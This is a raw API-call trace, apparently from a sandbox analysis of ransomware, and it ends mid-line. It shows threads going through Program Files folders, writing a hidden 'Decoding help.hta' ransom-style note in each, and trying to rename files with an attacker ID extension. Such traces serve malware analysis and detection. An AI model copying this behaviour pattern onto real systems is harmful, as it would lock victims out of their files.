ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.jpg", cAlternateFileName="")) returned 1 [0042.772] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0042.772] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0042.772] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_48.jpg") returned -1 [0042.772] lstrlenW (lpString="DMR_48.jpg") returned 10 [0042.772] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.772] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.772] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="DMR_48.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg" [0042.773] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg" [0042.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0042.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.773] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x898f4b97, ftCreationTime.dwHighDateTime=0x1c9ea0d, ftLastAccessTime.dwLowDateTime=0x898f4b97, ftLastAccessTime.dwHighDateTime=0x1c9ea0d, ftLastWriteTime.dwLowDateTime=0x898f4b97, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x10a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.png", cAlternateFileName="")) returned 1 [0042.773] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0042.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0042.773] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_48.png") returned -1 [0042.773] lstrlenW (lpString="DMR_48.png") returned 10 [0042.773] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="DMR_48.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png" [0042.773] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png" [0042.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.[ID]g9uZrLhJaygpwRm1[ID]" [0042.773] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\DMR_48.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\media renderer\\dmr_48.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.773] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8291abe2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8291abe2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b2192a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 1 [0042.773] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.773] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.773] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0042.773] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0042.774] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RenderingControl.xml") returned -1 [0042.774] lstrlenW (lpString="RenderingControl.xml") returned 20 [0042.774] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*" [0042.774] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\*.*") returned 60 [0042.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\", lpString2="RenderingControl.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml" [0042.774] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml" [0042.774] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0042.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml" (normalized: "c:\\program files\\windows media player\\media renderer\\renderingcontrol.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Media Renderer\\RenderingControl.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows media player\\media renderer\\renderingcontrol.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.774] FindNextFileW (in: hFindFile=0x5db2f8, lpFindFileData=0x132dfd30 | out: lpFindFileData=0x132dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8291abe2, ftCreationTime.dwHighDateTime=0x1ca0419, ftLastAccessTime.dwLowDateTime=0x8291abe2, ftLastAccessTime.dwHighDateTime=0x1ca0419, ftLastWriteTime.dwLowDateTime=0x8b2192a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0d, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 0 [0042.774] FindClose (in: hFindFile=0x5db2f8 | out: hFindFile=0x5db2f8) returned 1 Thread: id = 258 os_tid = 0x930 [0040.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*", lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7e50 [0040.633] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.634] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22cc0dd2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.634] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.634] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.634] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ImagingDevices.exe.mui", cAlternateFileName="")) returned 1 [0040.634] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" [0040.634] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned 51 [0040.634] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta" [0040.634] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\en-us\\decoding help.hta")) returned 0xffffffff [0040.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0040.834] WriteFile (in: hFile=0x33c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x9d8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x9d8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0040.835] CloseHandle (hObject=0x33c) returned 1 [0040.835] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.286] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ImagingDevices.exe.mui") returned -1 [0041.286] lstrlenW (lpString="ImagingDevices.exe.mui") returned 22 [0041.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" [0041.287] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned 51 [0041.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\", lpString2="ImagingDevices.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" [0041.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" [0041.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\imagingdevices.exe.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\en-us\\imagingdevices.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.287] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoAcq.dll.mui", cAlternateFileName="")) returned 1 [0041.287] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" [0041.287] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned 51 [0041.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta" [0041.287] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\en-us\\decoding help.hta")) returned 0x1 [0041.287] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoAcq.dll.mui") returned -1 [0041.287] lstrlenW (lpString="PhotoAcq.dll.mui") returned 16 [0041.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" [0041.287] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned 51 [0041.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\", lpString2="PhotoAcq.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" [0041.287] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" [0041.287] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoacq.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoacq.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.287] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 1 [0041.288] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" [0041.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned 51 [0041.288] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta" [0041.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows photo viewer\\en-us\\decoding help.hta")) returned 0x1 [0041.288] lstrcmpiW (lpString1="Decoding help.hta", lpString2="PhotoViewer.dll.mui") returned -1 [0041.288] lstrlenW (lpString="PhotoViewer.dll.mui") returned 19 [0041.288] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*" [0041.288] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\*.*") returned 51 [0041.288] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\", lpString2="PhotoViewer.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" [0041.288] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" [0041.288] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoviewer.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows photo viewer\\en-us\\photoviewer.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.288] FindNextFileW (in: hFindFile=0x5d7e50, lpFindFileData=0x9d8fd30 | out: lpFindFileData=0x9d8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11090870, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x11090870, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="PhotoViewer.dll.mui", cAlternateFileName="")) returned 0 [0041.288] FindClose (in: hFindFile=0x5d7e50 | out: hFindFile=0x5d7e50) returned 1 Thread: id = 259 os_tid = 0x950 [0040.635] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*", lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8044b2b8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8044b2b8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db338 [0042.248] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.248] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8044b2b8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8044b2b8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.248] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.248] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.249] FindNextFileW (in: hFindFile=0x5db338, lpFindFileData=0x930fd30 | out: lpFindFileData=0x930fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf365935, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0xaf365935, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0x6c2c7e17, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x152e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ConnectionManager.xml", cAlternateFileName="")) returned 1 [0042.249] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*" [0042.249] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\*.*") returned 61 [0042.249] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Media Player\\Network Sharing\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Media 